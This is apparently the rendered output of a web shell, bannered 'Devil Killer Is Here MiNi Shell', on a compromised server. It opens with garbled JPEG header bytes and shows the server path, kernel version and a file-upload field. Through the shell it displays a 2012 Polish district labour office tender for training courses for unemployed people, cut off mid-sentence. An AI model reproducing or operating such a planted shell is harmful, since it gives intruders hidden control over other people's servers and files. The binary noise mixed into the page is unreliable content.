JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120307/70602-N-2012.html

<p class="kh_header"><b>Strzelce Krajeńskie: Zorganizowanie  i przeprowadzenie szkoleń grupowych  dla osób bezrobotnych oraz poszukujących pracy zarejestrowanych w Powiatowym Urzędzie Pracy w Strzelcach Kraj</b><br>
<b>Numer ogłoszenia: 70602 - 2012; data zamieszczenia: 07.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , al. Wolności 39, 66-500 Strzelce Krajeńskie, woj. lubuskie, tel. 095 7631140, faks 095 7637216.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.pup.strzelcek.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie  i przeprowadzenie szkoleń grupowych  dla osób bezrobotnych oraz poszukujących pracy zarejestrowanych w Powiatowym Urzędzie Pracy w Strzelcach Kraj.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie cz. nr 1. Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia grupowego pn. Drwal-pilarz leśny dla 5 osób bezrobotnych lub poszukujących pracy. Termin realizacji szkolenia kwiecień - maj 2012r. (maksymalnie 5 tygodni). Program szkolenia (zgodny z zarządzeniem nr 19 Dyrektora Generalnego Lasów Państwowych z dnia 19 lipca 1997r.)
Zadanie cz. nr 2. Przeprowadzenie i organizacja szkolenia grupowego pn. Opiekun osób starszych z językiem niemieckim dla 5 osób bezrobotnych lub poszukujących pracy. Termin realizacji szkolenia maj - czerwiec 2012r. (maksymalnie 6 tygodni).
Zadanie cz. nr 3. Przeprowadzenie i organizacja szkolenia grupowego pn. Operator koparki kl. III dla 5 osób bezrobotnych lub poszukujących pracy. Program szkolenia musi być opracowany zgodnie z wytycznymi Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie z 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych,  budowlanych i drogowych (Dz.U. 2001r Nr 118, poz. 1263). Termin realizacji zamówienia: maj  - lipiec 2012r.
Zadanie cz. nr 4. Przeprowadzenie i organizacja szkolenia grupowego pn. Operator wózka jezdniowego kat. II WJO dla 7 osób bezrobotnych lub poszukujących pracy.
Termin realizacji zamówienia: maj 2012r. (maksymalnie 3 tygodnie).
Zadanie cz. nr 5. Przeprowadzenie i organizacja szkolenia grupowego pn. Kwalifikacja wstępna przyśpieszona kat. C dla 8 osób bezrobotnych lub poszukujących pracy.Termin realizacji szkolenia: kwiecień -  maj 2012 r. Celem szkolenia jest nabycie wiedzy i  umiejętności niezbędnych do uzyskania odpowiednich uprawnień i podjęcia zatrudnienia na stanowisku kierowcy samochodu ciężarowego. Program szkolenia musi być opracowany zgodnie z przepisami prawa, m.in. Rozporządzenia Ministra Infrastruktury z dnia 02 lipca 2008 r. w sprawie szkolenia kierowców wykonujących przewóz drogowy (Dz. U. z 2008 r. Nr 124, poz. 805 ze zm.), ustawy o transporcie drogowym oraz ustawy - Prawo ruchu drogowego. Czas trwania szkolenia: maksymalnie 6 tygodni.
Zadanie cz. nr 6. Przeprowadzenie i organizacja szkolenia grupowego pn. Spawanie metodą MIG i  MAG dla 8 osób bezrobotnych lub poszukujących pracy. Celem szkolenia jest przygotowanie teoretyczne i praktyczne uczestników do egzaminu końcowego, otrzymania certyfikatu zgodnego z wytycznymi Instytutu Spawalnictwa w Gliwicach oraz podjęcie zatrudnienia na stanowisku spawacza zgodnie z nabytymi umiejętnościami. Program szkolenia musi być opracowany zgodnie z wytycznymi Instytutu Spawalnictwa w Gliwicach. Termin realizacji szkolenia: maj- czerwiec 2012 r. Czas trwania szkolenia: maksymalnie 8 tygodni..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać aktualny wpis do Rejestru Instytucji Szkoleniowych Wojewódzkiego Urzędu Pracy. W celu wykazania przez Wykonawcę warunku, o którym mowa powyżej Wykonawca zobowiązany jest przedłożyć aktualne zaświadczenie o wpisie przed podpisaniem umowy, zgodnie z załącznikiem nr 1.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie powyższego warunku Zamawiający uzna, gdy Wykonawca: wykaże wykonane, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych szkoleń, w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy- to w tym okresie), co najmniej 2 szkolenia liczące minimum 5 osób na każde ze szkoleń, o tematyce zgodnej z zadaniem częściowym, o które Wykonawca się ubiega wraz z dokumentem potwierdzającym, że wykazane szkolenia zostały lub są należycie wykonane (np. referencje), zgodnie z załącznikiem nr 6.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna, gdy Wykonawca wykaże, iż dysponuje odpowiednim potencjałem technicznym zgodnie z załącznikami nr 9 i nr 9a.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna, gdy Wykonawca wskaże osoby, które będą uczestniczyć  w wykonywaniu zamówienia oraz oświadczy, że posiadają one wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, zgodnie z załącznikami nr 7, nr 7a oraz nr 8.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna gdy Wykonawca, znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Zamawiający nie definiuje szczegółowego opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie Wykonawcy potwierdzające, że zapoznał się z postanowieniami zawartymi w SIWZ i wzorem umowy oraz akceptuje jej warunki (załącznik nr 3 do SIWZ).
2. Certyfikat jakości usług, potwierdzający wysoki standard świadczonych usług szkoleniowych  (np. akredytacja kuratora oświaty, certyfikat systemu zarządzania jakością kształcenia/szkolenia wydany na podstawie międzynarodowych norm ISO, itp.), jeżeli Wykonawca takim dysponuje.
3. Program szkolenia (załącznik nr 4 do SIWZ).
4. Preliminarz kosztów (załącznik nr 5 do SIWZ).
5. W przypadku występowania pełnomocnika (osoby upoważnionej) należy złożyć pełnomocnictwo (upoważnienie) dla osoby podpisującej ofertę lub inny dokument, z którego wynikać będzie jej umocowanie do reprezentowania Wykonawcy w postępowaniach przetargowych, w tym podpisywania dokumentów przetargowych itp.
6. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, składających ofertę wspólną- należy dołączyć pełnomocnictwo (oryginał).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych zakazuje się dokonywania zmian postanowień zawartej umowy, jednakże Zamawiający dopuszcza możliwość dokonania następujących zmian: 
a) zmiany umowy w zakresie kwoty należnej jednostce szkoleniowej za wykonanie zamówienia w przypadku zmniejszenia liczby uczestników szkolenia z przyczyn niezależnych od Zamawiającego będących w szczególności wynikiem:
- niepodjęcia szkolenia przez osobę skierowaną na szkolenie, lub
- przerwania szkolenia z przyczyn, których nie można było przewidzieć w dniu podpisania umowy, a w szczególności z powodu podjęcia zatrudnienia lub innej pracy zarobkowej, działalności gospodarczej przez uczestnika szkolenia, lub
- nie brania udziału w szkoleniu przez uczestnika z powodu choroby, udokumentowanej zaświadczeniem lekarskim na druku ZUS ZLA, przez okres który uniemożliwi mu ukończenie szkolenia potwierdzone wydaniem stosownego zaświadczenia (certyfikatu), lub
- obniżenia kosztów szkolenia o koszt ubezpieczenia od następstw nieszczęśliwych wypadków osób bezrobotnych podlegających ubezpieczeniu z tytułu posiadania prawa do stypendium szkoleniowego o którym mowa w art. 41 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Tekst jednolity: Dz. U. z 2008 r. Nr 69, poz. 415 z późn. zm.).
W przypadku zmniejszenia liczby uczestników szkolenia, koszt szkolenia stanowić będzie iloczyn rzeczywistej liczby osób, które ukończyły szkolenie i kwoty stanowiący koszt szkolenia jednej osoby.
b) zmiany kadry dydaktycznej jedynie wtedy, gdy osoba zastępująca posiada równorzędne bądź wyższe uprawnienia od osoby zastępowanej  z powodu np. długotrwałej choroby (odpowiednio udokumentowanej) lub nie wywiązania się  obowiązków wynikających z umowy, a także gdy zmiana ta stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy i nie możliwych do przewidzenia w dniu zawarcia umowy, wymiana osoby wymaga akceptacji Zamawiającego.
c) zmiany miejsca  realizacji  szkolenia  wskazanego w załączniku nr 4 do SIWZ (z  zastrzeżeniem lokalizacji  t.j.  szkolenie teoretyczne: powiat strzelecko-drezdenecki, szkolenie praktyczne : powiat strzelecko-drezdenecki, powiaty ościenne lub miasto Gorzów Wlkp.), w sytuacji zaistnienia okoliczności niezawinionych przez Wykonawcę   i nie możliwych do przewidzenia w dniu zawarcia umowy, 
d) możliwość dokonania zmiany w zakresie imiennego wykazu uczestników szkolenia w przypadku rezygnacji uczestnika w trakcie szkolenia bądź innej nieprzewidzianej sytuacji;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.pup.strzelcek.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiat Strzelecko - Drezdenecki  
Powiatowy Urząd Pracy
Al.  Wolności 39
66-500 Strzelce Kraj.
sekretariat pokój nr 25 (I piętro),.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2012 godzina 09:00, miejsce: Powiatowy Urząd Pracy
Al.  Wolności 39
66-500 Strzelce Kraj.
sekretariat pokój nr 25 (I piętro),.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Drwal- pilarz leśny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia grupowego pn. Drwal-pilarz leśny dla 5 osób bezrobotnych lub poszukujących pracy finansowanego ze środków Funduszu Pracy. Uczestnikami   szkolenia będą osoby bezrobotne lub poszukujące pracy zamieszkujące teren powiatu strzelecko - drezdeneckiego. Zajęcia odbywać się będą od poniedziałku do piątku z wyłączeniem świąt, w godzinach 8.00 - 17.00, przeciętnie  nie   mniej niż 25 godzin zegarowych w tygodniu, maksymalnie 8 godzin dziennie. Godzina zegarowa = 45 minut zajęć+ 15 minut przerwy, przerwy mogą być dostosowywane elastycznie z zachowaniem w/w proporcji.  Liczba  godzin zegarowych szkolenia 120. Miejsce realizacji szkolenia: szkolenie teoretyczne: powiat strzelecko - drezdenecki, szkolenie praktyczne: powiat strzelecko - drezdenecki, powiaty ościenne lub miasto Gorzów Wlkp. Celem szkolenia jest nabycie wiedzy i umiejętności  niezbędnych do podjęcia zatrudnienia na stanowisku  pilarza. Liczba osób przy jednym stanowisku prowadzonych zajęć praktycznych - maksymalnie dwie osoby. Najpóźniej w dniu rozpoczęcia szkolenia Wykonawca przekazuje Zamawiającemu pełny harmonogram zajęć.     Termin realizacji szkolenia kwiecień - maj 2012r. (maksymalnie 5 tygodni). Program szkolenia (zgodny  z zarządzeniem nr 19 Dyrektora Generalnego Lasów Państwowych z dnia 19 lipca 1997r.) powinien zawierać:
- wiadomości z zakresu budowy i zasad działania pilarki spalinowej oraz sprzętu pomocniczego,
- umiejętności obsługi oraz konserwacji (bieżącej i okresowej) w/w urządzeń,
- poprawną technikę wykonywania wszystkich operacji  i czynności związanych 
z przygotowaniem sprzętu do pozyskiwania drewna..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opiekun osób starszych z językiem niemieckim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie i organizacja szkolenia grupowego pn. Opiekun osób starszych z językiem niemieckim dla 5 osób bezrobotnych lub poszukujących pracy ze środków Funduszu Pracy. Uczestnikami szkolenia będą osoby bezrobotne i poszukujące pracy zamieszkujące teren powiatu strzelecko - drezdeneckiego. Celem szkolenia jest przygotowanie teoretyczne i praktyczne uczestników szkolenia do pracy w charakterze opiekunów osób starszych. Program szkolenia powinien obejmować 150 godzin szkoleniowych (czas trwania egzaminu nie jest wliczany w czas trwania szkolenia). Zajęcia odbywać się będą od poniedziałku do piątku z wyłączeniem świąt, w godzinach 8.00  - 17.00, przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu, maksymalnie 8 godzin dziennie. Godzina zegarowa = 45 minut zajęć + 15 minut przerwy, przerwy mogą być dostosowywane elastycznie z zachowaniem w/w proporcji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Operator koparki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie i organizacja szkolenia grupowego pn. Operator koparki kl. III dla 5 osób bezrobotnych lub poszukujących pracy ze środków Funduszu Pracy. Uczestnikami szkolenia będą osoby bezrobotne i poszukujące pracy zamieszkujące teren powiatu strzelecko - drezdeneckiego. Celem szkolenia jest przygotowanie uczestników kursu do uzyskania kwalifikacji w zawodzie operatora koparki kl. III uprawnień. Program szkolenia musi być opracowany zgodnie z wytycznymi Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie z 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych,  budowlanych i drogowych (Dz.U. 2001r Nr 118, poz. 1263) i ma obejmować zajęcia teoretyczne m.in. : budowę maszyn, technologię robót, silniki spalinowe, bhp oraz zajęcia praktyczne z obsługi koparki.  Ilość godzin przypadająca na 1 uczestnika  202 godziny zegarowe. Zajęcia odbywać się będą od poniedziałku do piątku z wyłączeniem świąt, w godzinach 8.00  - 17.00, przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu, maksymalnie 8 godzin dziennie. Godzina zegarowa = 45 minut zajęć + 15 minut przerwy, przerwy mogą być dostosowywane elastycznie z zachowaniem w/w proporcji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Operator wózka jezdniowego kat. II WJO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie i organizacja szkolenia grupowego pn. Operator wózka jezdniowego kat. II WJO dla 7 osób bezrobotnych lub poszukujących pracy ze środków Funduszu Pracy. Uczestnikami szkolenia będą osoby bezrobotne i poszukujące pracy zamieszkujące teren powiatu strzelecko 
